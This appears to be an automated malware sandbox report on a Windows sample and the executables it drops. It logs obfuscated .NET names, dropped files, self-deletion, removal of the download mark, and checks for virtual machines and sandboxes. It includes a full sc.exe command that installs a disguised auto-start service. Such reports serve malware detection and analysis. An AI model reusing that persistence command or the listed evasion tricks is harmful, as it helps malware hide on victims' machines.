                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.0.B217.exe.a90000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.0.B217.exe.a90000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.2.B217.exe.a90000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 27.0.B217.exe.a90000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 27.0.B217.exe.a90000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 42.0.B217.exe.1b0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 42.0.B217.exe.1b0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                      Source: 42.0.B217.exe.1b0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rcvfbteJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3657.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\50E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8ECE.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A019.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rcvfbteJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7F9A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9460.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2EE4.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B217.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\72B9.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9779.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\969F.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeFile created: C:\Users\user\AppData\Local\Temp\lnagngtg.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A881.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\293.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\48E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\41A3.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\za3cyu28yl.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\rcvfbte:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking mutex)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: A019.exe, 00000014.00000002.407579269.00000000020B0000.00000004.00000001.sdmpBinary or memory string: ASWHOOK
                      Found evasive API chain (may stop execution after checking locale)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rcvfbteKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00406AA0
                      Found evasive API chain (may stop execution after checking computer name)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 5528Thread sleep count: 577 > 30
                      Source: C:\Windows\explorer.exe TID: 5848Thread sleep count: 223 > 30
                      Source: C:\Windows\explorer.exe TID: 2464Thread sleep count: 271 > 30
                      Source: C:\Windows\explorer.exe TID: 6888Thread sleep count: 403 > 30
                      Source: C:\Windows\explorer.exe TID: 4784Thread sleep count: 167 > 30
                      Source: C:\Windows\explorer.exe TID: 4700Thread sleep count: 168 > 30
                      Source: C:\Windows\explorer.exe TID: 5776Thread sleep count: 310 > 30
                      Source: C:\Windows\explorer.exe TID: 4620Thread sleep count: 148 > 30
                      Source: C:\Windows\System32\svchost.exe TID: 6848Thread sleep time: -210000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\B217.exe TID: 3220Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 577
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 403
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeAPI coverage: 8.1 %
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeAPI coverage: 6.4 %
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00406AA0
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3657.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\50E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8ECE.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7F9A.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2EE4.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\72B9.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\969F.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lnagngtg.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\293.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\48E7.exeJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\41A3.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeEvaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeAPI call chain: ExitProcess graph end node
                      Source: explorer.exe, 0000000A.00000000.332068185.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000000A.00000000.332149562.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                      Source: explorer.exe, 0000000A.00000000.332068185.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                      Source: explorer.exe, 0000000A.00000000.296393454.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000018.00000002.432567501.000001C13CAA6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
                      Source: explorer.exe, 0000000A.00000000.300343479.0000000008778000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}USERDOM
                      Source: explorer.exe, 0000000A.00000000.296393454.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                      Source: WerFault.exe, 00000015.00000003.425462493.0000000004A2F000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.425376239.0000000004A82000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000002.435145098.0000000004A82000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000002.434911058.0000000004A2F000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.433029816.000001C13CAEB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 0000000A.00000000.332068185.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: svchost.exe, 00000004.00000002.550308378.0000026E6343D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.552754472.00000203DA029000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.423478230.0000000004A81000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_004196BC GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
